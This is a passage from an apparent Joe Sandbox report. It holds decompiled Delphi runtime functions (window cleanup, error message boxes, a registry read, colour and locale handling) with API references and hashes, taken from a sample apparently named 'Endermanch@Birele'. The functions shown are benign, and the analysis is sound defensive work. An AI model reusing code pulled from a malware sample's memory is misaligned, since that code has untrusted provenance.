                                                                                                          				_t27 = _t39;
                                                                                                          				E00405CBC();
                                                                                                          				asm("bts dword [ebx+0x35], 0x3");
                                                                                                          				if(_t51 >= 0) {
                                                                                                          					 *((intOrPtr*)(_t39 + 0xca)) = 0;
                                                                                                          					E00406808( *((intOrPtr*)(_t39 + 0xca)));
                                                                                                          					E00406808( *((intOrPtr*)(_t39 + 0xee)));
                                                                                                          					if( *(_t39 + 0x1c) != 0) {
                                                                                                          						asm("jecxz 0x12");
                                                                                                          						_t47 =  *((intOrPtr*)(_t39 + 0xfe)) + 1;
                                                                                                          						if(_t47 != 0 && ( *(_t39 + 0x34) & 0x00000004) == 0) {
                                                                                                          							DestroyCursor(_t47 - 1);
                                                                                                          						}
                                                                                                          						if(IsWindow( *(_t39 + 0x1c)) != 0) {
                                                                                                          							SetWindowLongA( *(_t39 + 0x1c), 0xffffffeb, 0);
                                                                                                          							DestroyWindow( *(_t39 + 0x1c));
                                                                                                          						}
                                                                                                          						 *(_t39 + 0x1c) = 0;
                                                                                                          					}
                                                                                                          					_push(0);
                                                                                                          					if(( *(_t39 + 0x39) & 0x00000020) != 0) {
                                                                                                          						_push( *((intOrPtr*)(_t39 + 0xea)));
                                                                                                          					}
                                                                                                          					asm("jecxz 0x3");
                                                                                                          					_push( *((intOrPtr*)(_t39 + 0xe6)));
                                                                                                          					L13:
                                                                                                          					_pop(_t44);
                                                                                                          					asm("jecxz 0xa");
                                                                                                          					E00402658(_t44);
                                                                                                          					goto L13;
                                                                                                          				}
                                                                                                          				return _t27;
                                                                                                          			}










                                                                                                          0x004071e6
                                                                                                          0x004071ed
                                                                                                          0x004071ee
                                                                                                          0x004071f2
                                                                                                          0x004071f2
                                                                                                          0x004071f8
                                                                                                          0x004071fa
                                                                                                          0x004071fa
                                                                                                          0x00407203
                                                                                                          0x00407208
                                                                                                          0x0040720d
                                                                                                          0x0040720f
                                                                                                          0x00407214
                                                                                                          0x00407219
                                                                                                          0x00407221
                                                                                                          0x00407227
                                                                                                          0x00407232
                                                                                                          0x0040723c
                                                                                                          0x00407244
                                                                                                          0x00407246
                                                                                                          0x00407247
                                                                                                          0x00407251
                                                                                                          0x00407251
                                                                                                          0x00407260
                                                                                                          0x00407269
                                                                                                          0x00407271
                                                                                                          0x00407271
                                                                                                          0x00407278
                                                                                                          0x00407278
                                                                                                          0x0040727b
                                                                                                          0x00407281
                                                                                                          0x00407283
                                                                                                          0x00407283
                                                                                                          0x0040728f
                                                                                                          0x00407291
                                                                                                          0x00407292
                                                                                                          0x00407292
                                                                                                          0x00407293
                                                                                                          0x00407296
                                                                                                          0x00000000
                                                                                                          0x00407296
                                                                                                          0x004072f4

                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00407208
                                                                                                          • DestroyCursor.USER32(?), ref: 00407251
                                                                                                          • IsWindow.USER32(?), ref: 00407259
                                                                                                          • SetWindowLongA.USER32(?,000000EB,00000000), ref: 00407269
                                                                                                          • DestroyWindow.USER32(?,?,000000EB,00000000,?), ref: 00407271
                                                                                                          • DeleteObject.GDI32(00000000), ref: 004072A5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Destroy$CursorDeleteLongObjectShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 456105792-3916222277
                                                                                                          • Opcode ID: 23ed33c5bcd0cc5be3f101e1f6a54e12245bd97385b514238246d13e070e42ba
                                                                                                          • Instruction ID: 1aa22ef67bf754e5a406974058cf119eeac3fa97d4315ddcdd87a4db4b43ae75
                                                                                                          • Opcode Fuzzy Hash: 23ed33c5bcd0cc5be3f101e1f6a54e12245bd97385b514238246d13e070e42ba
                                                                                                          • Instruction Fuzzy Hash: 35316F71A092019ADB59BF21C885F673694EF00304F5488FFBD02BE1C7DA3DE8119A5D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 79%
                                                                                                          			E00403830(void* __ecx) {
                                                                                                          				long _v4;
                                                                                                          				int _t3;
                                                                                                          
                                                                                                          				if( *0x419044 == 0) {
                                                                                                          					if( *0x418030 == 0) {
                                                                                                          						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                          					}
                                                                                                          					return _t3;
                                                                                                          				} else {
                                                                                                          					if( *0x419218 == 0xd7b2 &&  *0x419220 > 0) {
                                                                                                          						 *0x419230();
                                                                                                          					}
                                                                                                          					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                          					return WriteFile(GetStdHandle(0xfffffff5), 0x4038b8, 2,  &_v4, 0);
                                                                                                          				}
                                                                                                          			}





                                                                                                          0x00403838
                                                                                                          0x00403898
                                                                                                          0x004038a8
                                                                                                          0x004038a8
                                                                                                          0x004038ae
                                                                                                          0x0040383a
                                                                                                          0x00403843
                                                                                                          0x00403853
                                                                                                          0x00403853
                                                                                                          0x0040386f
                                                                                                          0x00403890
                                                                                                          0x00403890

                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,004038FE,?,?,?,?,?,?,?,0040399E,004026D3), ref: 00403869
                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,004038FE,?,?,?,?,?,?,?,0040399E), ref: 0040386F
                                                                                                          • GetStdHandle.KERNEL32(000000F5,004038B8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,004038FE), ref: 00403884
                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,004038B8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,004038FE), ref: 0040388A
                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004038A8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                          • Opcode ID: 66f489a76bdded7ab0662bc3b4cdd2177284456a9c4f740b5969ec60df8e6194
                                                                                                          • Instruction ID: a631a757e5c2189165fce7d7760e516ff7165c4c80e5b59565c1e8de73c670d0
                                                                                                          • Opcode Fuzzy Hash: 66f489a76bdded7ab0662bc3b4cdd2177284456a9c4f740b5969ec60df8e6194
                                                                                                          • Instruction Fuzzy Hash: 6EF0627168434878E72477609D16F9A3A8C570CB15F24CABFF610780E2C7BC49C8822D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040CC10(void* __edx, void* __edi, void* __fp0) {
                                                                                                          				void _v1024;
                                                                                                          				char _v1088;
                                                                                                          				long _v1092;
                                                                                                          				void* _t12;
                                                                                                          				char* _t14;
                                                                                                          				intOrPtr _t16;
                                                                                                          				intOrPtr _t18;
                                                                                                          				intOrPtr _t24;
                                                                                                          				long _t32;
                                                                                                          
                                                                                                          				E0040CA88(_t12,  &_v1024, __edx, __fp0, 0x400);
                                                                                                          				_t14 =  *0x418660; // 0x419044
                                                                                                          				if( *_t14 == 0) {
                                                                                                          					_t16 =  *0x418558; // 0x4088fc
                                                                                                          					_t9 = _t16 + 4; // 0xffe8
                                                                                                          					_t18 =  *0x419660; // 0x400000
                                                                                                          					LoadStringA(E004048BC(_t18),  *_t9,  &_v1088, 0x40);
                                                                                                          					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                                                          				}
                                                                                                          				_t24 =  *0x41857c; // 0x419214
                                                                                                          				E0040272C(E0040288C(_t24));
                                                                                                          				CharToOemA( &_v1024,  &_v1024);
                                                                                                          				_t32 = E00409ED0( &_v1024, __edi);
                                                                                                          				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                                                                                          				return WriteFile(GetStdHandle(0xfffffff4), 0x40ccd4, 2,  &_v1092, 0);
                                                                                                          			}












                                                                                                          0x0040cc1f
                                                                                                          0x0040cc24
                                                                                                          0x0040cc2c
                                                                                                          0x0040cc93
                                                                                                          0x0040cc98
                                                                                                          0x0040cc9c
                                                                                                          0x0040cca7
                                                                                                          0x00000000
                                                                                                          0x0040ccbd
                                                                                                          0x0040cc2e
                                                                                                          0x0040cc38
                                                                                                          0x0040cc47
                                                                                                          0x0040cc57
                                                                                                          0x0040cc6a
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                            • Part of subcall function 0040CA88: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CAA5
                                                                                                            • Part of subcall function 0040CA88: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CAC9
                                                                                                            • Part of subcall function 0040CA88: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CAE4
                                                                                                            • Part of subcall function 0040CA88: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0040CB7A
                                                                                                          • CharToOemA.USER32(?,?), ref: 0040CC47
                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040CC64
                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CC6A
                                                                                                          • GetStdHandle.KERNEL32(000000F4,0040CCD4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CC7F
                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,0040CCD4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CC85
                                                                                                          • LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 0040CCA7
                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040CCBD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 185507032-0
                                                                                                          • Opcode ID: 368da9933a34329ca827390007981b96a17e630d85f57cb8d8c292548cd21b58
                                                                                                          • Instruction ID: dde01d23e6afb3a9f06864aaa6cde776362b0f57c47d944cf77e5eae6f11e29d
                                                                                                          • Opcode Fuzzy Hash: 368da9933a34329ca827390007981b96a17e630d85f57cb8d8c292548cd21b58
                                                                                                          • Instruction Fuzzy Hash: CA111FB2154204AED200F7A5CC86F9B77ACAB44704F80463FB754E71E2DA78E9449B6E
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 65%
                                                                                                          			E00402D98() {
                                                                                                          				void* _v8;
                                                                                                          				char _v12;
                                                                                                          				int _v16;
                                                                                                          				signed short _t12;
                                                                                                          				signed short _t14;
                                                                                                          				intOrPtr _t27;
                                                                                                          				void* _t29;
                                                                                                          				void* _t31;
                                                                                                          				intOrPtr _t32;
                                                                                                          
                                                                                                          				_t29 = _t31;
                                                                                                          				_t32 = _t31 + 0xfffffff4;
                                                                                                          				_v12 =  *0x418024 & 0x0000ffff;
                                                                                                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                          					_t12 =  *0x418024; // 0x1332
                                                                                                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                                          					 *0x418024 = _t14;
                                                                                                          					return _t14;
                                                                                                          				} else {
                                                                                                          					_push(_t29);
                                                                                                          					_push(E00402E09);
                                                                                                          					_push( *[fs:eax]);
                                                                                                          					 *[fs:eax] = _t32;
                                                                                                          					_v16 = 4;
                                                                                                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                          					_pop(_t27);
                                                                                                          					 *[fs:eax] = _t27;
                                                                                                          					_push(0x402e10);
                                                                                                          					return RegCloseKey(_v8);
                                                                                                          				}
                                                                                                          			}












                                                                                                          0x00402d99
                                                                                                          0x00402d9b
                                                                                                          0x00402da5
                                                                                                          0x00402dc1
                                                                                                          0x00402e10
                                                                                                          0x00402e22
                                                                                                          0x00402e25
                                                                                                          0x00402e2e
                                                                                                          0x00402dc3
                                                                                                          0x00402dc5
                                                                                                          0x00402dc6
                                                                                                          0x00402dcb
                                                                                                          0x00402dce
                                                                                                          0x00402dd1
                                                                                                          0x00402ded
                                                                                                          0x00402df4
                                                                                                          0x00402df7
                                                                                                          0x00402dfa
                                                                                                          0x00402e08
                                                                                                          0x00402e08

                                                                                                          APIs
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402DBA
                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402E09,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402DED
                                                                                                          • RegCloseKey.ADVAPI32(?,00402E10,00000000,?,00000004,00000000,00402E09,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402E03
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                          • Opcode ID: 67336588137742afaa6a361b3752e4063beb9b9ae596f806d9355139b5fbc234
                                                                                                          • Instruction ID: ad6bd215342f7588ae9e52c32b31fbfb63ae62d1ae1e48a1402ae786e0266473
                                                                                                          • Opcode Fuzzy Hash: 67336588137742afaa6a361b3752e4063beb9b9ae596f806d9355139b5fbc234
                                                                                                          • Instruction Fuzzy Hash: BF015275940608BAD711DB90DD46BEA77B9D708B00F2105BABA04F65D0E6B85A50869C
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 71%
                                                                                                          			E00407BA2(intOrPtr __eax, intOrPtr* __ecx, void* __edx) {
                                                                                                          				int _t39;
                                                                                                          				char _t41;
                                                                                                          				void* _t42;
                                                                                                          				intOrPtr _t44;
                                                                                                          				intOrPtr _t48;
                                                                                                          				signed int* _t50;
                                                                                                          				void* _t53;
                                                                                                          				void** _t55;
                                                                                                          				long _t65;
                                                                                                          				intOrPtr _t72;
                                                                                                          				intOrPtr _t75;
                                                                                                          				intOrPtr _t82;
                                                                                                          				void* _t88;
                                                                                                          				intOrPtr _t92;
                                                                                                          
                                                                                                          				_t74 = __ecx;
                                                                                                          				_t72 = __eax;
                                                                                                          				_t88 = __edx;
                                                                                                          				_t82 =  *((intOrPtr*)(__edx + 4)) - 0xbd32;
                                                                                                          				_t95 = _t82 - 6;
                                                                                                          				if(_t82 > 6) {
                                                                                                          					__eflags =  *((short*)(__edx + 4)) - 0xb005;
                                                                                                          					if( *((short*)(__edx + 4)) != 0xb005) {
                                                                                                          						L18:
                                                                                                          						_t39 = 0;
                                                                                                          						__eflags =  *((short*)(_t88 + 4)) - 7;
                                                                                                          						if( *((short*)(_t88 + 4)) != 7) {
                                                                                                          							goto L23;
                                                                                                          						}
                                                                                                          						 *_t74 = 0;
                                                                                                          						_t41 = E00407CF4(_t72);
                                                                                                          						__eflags = _t41;
                                                                                                          						if(_t41 == 0) {
                                                                                                          							goto L5;
                                                                                                          						}
                                                                                                          						_push(_t41);
                                                                                                          						_t75 =  *((intOrPtr*)(_t41 + 0xf2));
                                                                                                          						asm("jecxz 0x19");
                                                                                                          						__eflags = _t75 - _t72;
                                                                                                          						if(_t75 != _t72) {
                                                                                                          							_t44 =  *((intOrPtr*)(_t75 + 0x50));
                                                                                                          							_t82 = _t44;
                                                                                                          							 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0xa8))))();
                                                                                                          						}
                                                                                                          						_pop(_t42);
                                                                                                          						 *((intOrPtr*)(_t42 + 0xf2)) = _t72;
                                                                                                          						_t39 = 0;
                                                                                                          						__eflags = 0;
                                                                                                          						_push(_t82);
                                                                                                          						goto L23;
                                                                                                          					}
                                                                                                          					_push(__ecx);
                                                                                                          					_t78 =  *(__edx + 0xa) & 0x0000ffff;
                                                                                                          					_t92 =  *((intOrPtr*)(__eax + 0x4c));
                                                                                                          					__eflags = _t78 -  *((intOrPtr*)(_t92 + 0x20));
                                                                                                          					if(_t78 !=  *((intOrPtr*)(_t92 + 0x20))) {
                                                                                                          						_t48 =  *((intOrPtr*)(__eax + 0x4c));
                                                                                                          						__eflags = _t78 -  *((intOrPtr*)(_t48 + 0x22));
                                                                                                          						_t50 =  *((intOrPtr*)(__eax + 0x50)) + 0x98;
                                                                                                          						if(_t78 ==  *((intOrPtr*)(_t48 + 0x22))) {
                                                                                                          							L13:
                                                                                                          							_t78 =  *_t50;
                                                                                                          							 *( *_t50)();
                                                                                                          							L16:
                                                                                                          							_t53 = E004078A0(_t72, _t88);
                                                                                                          							goto L4;
                                                                                                          						}
                                                                                                          						_t50 =  &(_t50[2]);
                                                                                                          						__eflags = _t78 -  *((intOrPtr*)(_t92 + 0x24));
                                                                                                          						if(_t78 ==  *((intOrPtr*)(_t92 + 0x24))) {
                                                                                                          							goto L13;
                                                                                                          						}
                                                                                                          						_t50 = _t50 - 0x10;
                                                                                                          						__eflags = _t78 -  *((intOrPtr*)(_t92 + 0x26));
                                                                                                          						if(_t78 !=  *((intOrPtr*)(_t92 + 0x26))) {
                                                                                                          							__eflags = _t78 -  *((intOrPtr*)(_t92 + 0x28));
                                                                                                          							if(_t78 !=  *((intOrPtr*)(_t92 + 0x28))) {
                                                                                                          								_pop(_t74);
                                                                                                          								goto L18;
                                                                                                          							}
                                                                                                          							_t38 = E004064E8(__eax);
                                                                                                          							goto L16;
                                                                                                          						}
                                                                                                          						goto L13;
                                                                                                          					}
                                                                                                          					__eflags =  *((char*)(__eax + 0x12a));
                                                                                                          					if( *((char*)(__eax + 0x12a)) <= 0) {
                                                                                                          						E004080F4(__eax, 1);
                                                                                                          						E00407CE0(_t72);
                                                                                                          					}
                                                                                                          					goto L16;
                                                                                                          				} else {
                                                                                                          					_push(__ecx);
                                                                                                          					SetTextColor( *(__edx + 8), E00406A10( *((intOrPtr*)(__eax + 0xa0)), _t95));
                                                                                                          					if(( *(_t72 + 0x35) & 0x00000001) == 0) {
                                                                                                          						_t65 = E00406A10( *((intOrPtr*)(_t72 + 0xa4)), __eflags);
                                                                                                          						SetBkMode( *(__edx + 8), 2);
                                                                                                          						SetBkColor( *(__edx + 8), _t65);
                                                                                                          						_t53 =  *0x418100();
                                                                                                          					} else {
                                                                                                          						SetBkMode( *(__edx + 8), 1);
                                                                                                          						_t53 = GetStockObject(5);
                                                                                                          					}
                                                                                                          					L4:
                                                                                                          					_pop(_t55);
                                                                                                          					 *_t55 = _t53;
                                                                                                          					L5:
                                                                                                          					_t39 = 1;
                                                                                                          					L23:
                                                                                                          					return _t39;
                                                                                                          				}
                                                                                                          			}

















                                                                                                          0x00407ba2
                                                                                                          0x00407ba5
                                                                                                          0x00407ba8
                                                                                                          0x00407bad
                                                                                                          0x00407bb2
                                                                                                          0x00407bb6
                                                                                                          0x00407c19
                                                                                                          0x00407c1f
                                                                                                          0x00407c94
                                                                                                          0x00407c94
                                                                                                          0x00407c96
                                                                                                          0x00407c9b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00407c9d
                                                                                                          0x00407ca1
                                                                                                          0x00407ca6
                                                                                                          0x00407ca8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00407cae
                                                                                                          0x00407caf
                                                                                                          0x00407cb5
                                                                                                          0x00407cb7
                                                                                                          0x00407cb9
                                                                                                          0x00407cbc
                                                                                                          0x00407cc5
                                                                                                          0x00407ccc
                                                                                                          0x00407ccc
                                                                                                          0x00407cce
                                                                                                          0x00407ccf
                                                                                                          0x00407cd5
                                                                                                          0x00407cd5
                                                                                                          0x00407cd7
                                                                                                          0x00000000
                                                                                                          0x00407cd8
                                                                                                          0x00407c21
                                                                                                          0x00407c22
                                                                                                          0x00407c26
                                                                                                          0x00407c29
                                                                                                          0x00407c2d
                                                                                                          0x00407c4a
                                                                                                          0x00407c4d
                                                                                                          0x00407c54
                                                                                                          0x00407c5a
                                                                                                          0x00407c6e
                                                                                                          0x00407c6e
                                                                                                          0x00407c75
                                                                                                          0x00407c86
                                                                                                          0x00407c89
                                                                                                          0x00000000
                                                                                                          0x00407c89
                                                                                                          0x00407c5c
                                                                                                          0x00407c5f
                                                                                                          0x00407c63
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00407c65
                                                                                                          0x00407c68
                                                                                                          0x00407c6c
                                                                                                          0x00407c79
                                                                                                          0x00407c7d
                                                                                                          0x00407c93
                                                                                                          0x00000000
                                                                                                          0x00407c93
                                                                                                          0x00407c81
                                                                                                          0x00000000
                                                                                                          0x00407c81
                                                                                                          0x00000000
                                                                                                          0x00407c6c
                                                                                                          0x00407c2f
                                                                                                          0x00407c36
                                                                                                          0x00407c3c
                                                                                                          0x00407c43
                                                                                                          0x00407c43
                                                                                                          0x00000000
                                                                                                          0x00407bb8
                                                                                                          0x00407bb8
                                                                                                          0x00407bc9
                                                                                                          0x00407bd2
                                                                                                          0x00407bed
                                                                                                          0x00407bf8
                                                                                                          0x00407c01
                                                                                                          0x00407c08
                                                                                                          0x00407bd4
                                                                                                          0x00407bd9
                                                                                                          0x00407be0
                                                                                                          0x00407be0
                                                                                                          0x00407c0e
                                                                                                          0x00407c0f
                                                                                                          0x00407c10
                                                                                                          0x00407c12
                                                                                                          0x00407c12
                                                                                                          0x00407cd9
                                                                                                          0x00407cdc
                                                                                                          0x00407cdc

                                                                                                          APIs
                                                                                                            • Part of subcall function 00406A10: GetSysColor.USER32(?), ref: 00406A1A
                                                                                                          • SetTextColor.GDI32(?), ref: 00407BC9
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00407BD9
                                                                                                          • GetStockObject.GDI32(00000005), ref: 00407BE0
                                                                                                          • SetBkMode.GDI32(?,00000002), ref: 00407BF8
                                                                                                          • SetBkColor.GDI32(?), ref: 00407C01
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Mode$ObjectStockText
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759950171-0
                                                                                                          • Opcode ID: 69eee663e1eb35d7b5709880f5165b6fccca2c816edbe1fa8e9893acc805ec5b
                                                                                                          • Instruction ID: 52b9d8afabc737b8da5f542e8778fddf4e1e7a0f474652ad9cf9c2640bd08d0b
                                                                                                          • Opcode Fuzzy Hash: 69eee663e1eb35d7b5709880f5165b6fccca2c816edbe1fa8e9893acc805ec5b
                                                                                                          • Instruction Fuzzy Hash: 0F31A23160C5029FE724AF29CC84A6677A1EF45304F50847BE40AAB2D3D778F885C69A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 64%
                                                                                                          			E0040C7A4(void* __esi, void* __eflags) {
                                                                                                          				char _v8;
                                                                                                          				intOrPtr* _t18;
                                                                                                          				intOrPtr _t26;
                                                                                                          				void* _t27;
                                                                                                          				long _t29;
                                                                                                          				intOrPtr _t32;
                                                                                                          				void* _t33;
                                                                                                          
                                                                                                          				_t33 = __eflags;
                                                                                                          				_push(0);
                                                                                                          				_push(_t32);
                                                                                                          				_push(0x40c83b);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t32;
                                                                                                          				E0040C51C(GetThreadLocale(), 0x40c850, 0x100b,  &_v8);
                                                                                                          				_t29 = E00409A90(0x40c850, 1, _t33);
                                                                                                          				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                                                          					EnumCalendarInfoA(E0040C6F0, GetThreadLocale(), _t29, 4);
                                                                                                          					_t27 = 7;
                                                                                                          					_t18 = 0x4199f4;
                                                                                                          					do {
                                                                                                          						 *_t18 = 0xffffffff;
                                                                                                          						_t18 = _t18 + 4;
                                                                                                          						_t27 = _t27 - 1;
                                                                                                          					} while (_t27 != 0);
                                                                                                          					EnumCalendarInfoA(E0040C72C, GetThreadLocale(), _t29, 3);
                                                                                                          				}
                                                                                                          				_pop(_t26);
                                                                                                          				 *[fs:eax] = _t26;
                                                                                                          				_push(E0040C842);
                                                                                                          				return E004039AC( &_v8);
                                                                                                          			}










                                                                                                          0x0040c7a4
                                                                                                          0x0040c7a7
                                                                                                          0x0040c7ac
                                                                                                          0x0040c7ad
                                                                                                          0x0040c7b2
                                                                                                          0x0040c7b5
                                                                                                          0x0040c7cb
                                                                                                          0x0040c7dd
                                                                                                          0x0040c7e7
                                                                                                          0x0040c7f7
                                                                                                          0x0040c7fc
                                                                                                          0x0040c801
                                                                                                          0x0040c806
                                                                                                          0x0040c806
                                                                                                          0x0040c80c
                                                                                                          0x0040c80f
                                                                                                          0x0040c80f
                                                                                                          0x0040c820
                                                                                                          0x0040c820
                                                                                                          0x0040c827
                                                                                                          0x0040c82a
                                                                                                          0x0040c82d
                                                                                                          0x0040c83a

                                                                                                          APIs
                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0040C83B,?,?,00000000), ref: 0040C7BC
                                                                                                            • Part of subcall function 0040C51C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C53A
                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040C83B,?,?,00000000), ref: 0040C7EC
                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000C6F0,00000000,00000000,00000004), ref: 0040C7F7
                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040C83B,?,?,00000000), ref: 0040C815
                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000C72C,00000000,00000000,00000003), ref: 0040C820
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                          • String ID:
                                                                                                          • API String ID: 4102113445-0
                                                                                                          • Opcode ID: b4efea976117dbfcd008e1303a10a6ea3ec676ac57aa519e95f612c4c2fae50d
                                                                                                          • Instruction ID: 9bccf99b4e5e52be7ff95cc5428c7af3082483fe287810c798ae84d29e164835
                                                                                                          • Opcode Fuzzy Hash: b4efea976117dbfcd008e1303a10a6ea3ec676ac57aa519e95f612c4c2fae50d
                                                                                                          • Instruction Fuzzy Hash: 7701F771600644EBE311BB758C52B6B729CDB45728F60473AF400F76C1D67C9E005AAD
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E004014F4(void* __eax, void** __ecx, void* __edx) {
                                                                                                          				void* _t4;
                                                                                                          				void** _t9;
                                                                                                          				void* _t13;
                                                                                                          				void* _t14;
                                                                                                          				long _t16;
                                                                                                          				void* _t17;
                                                                                                          
